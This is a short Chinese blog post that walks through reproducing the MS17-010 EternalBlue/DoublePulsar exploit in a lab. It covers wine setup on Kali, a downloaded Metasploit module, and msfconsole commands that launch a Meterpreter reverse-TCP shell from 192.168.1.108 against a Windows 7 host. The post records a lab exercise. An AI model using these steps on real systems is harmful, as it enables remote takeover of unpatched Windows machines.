ms17-010 exp复现

前言
Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。

0x00 创建wine

kali 64位
kali 64位需要兼容32位环境才可以使用,执行以下命令来安装32位运行库

dpkg --add-architecture i386
apt-get update
apt-get install lib32z1 lib32ncurses5
apt-get install wine32
wine cmd.exe

kali 32位

直接执行
'wine cmd.exe'即可

《ms17-010 exp复现》

0x01修改exp

下载exp:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
解压文件将其中的deps文件夹和eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/下,我在这里将eternalblue_doublepulsar.rb重命名为ms17_010_smb_RCE.rb,方便以后的查找利用。

修改rb文件
《ms17-010 exp复现》

0x02 复现

攻击机:kali 192.168.1.108
靶 机:win7 64位 旗舰版 sp1(关闭防火墙)
MSF使用就很简单了,下面列出主要的命令

use exploit/windows/smb/ms17_010_smb_RCE
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.108
set rhost 192.168.1.107
set target 9
set targetarchitecture x64
exploit

附效果图
《ms17-010 exp复现》

点赞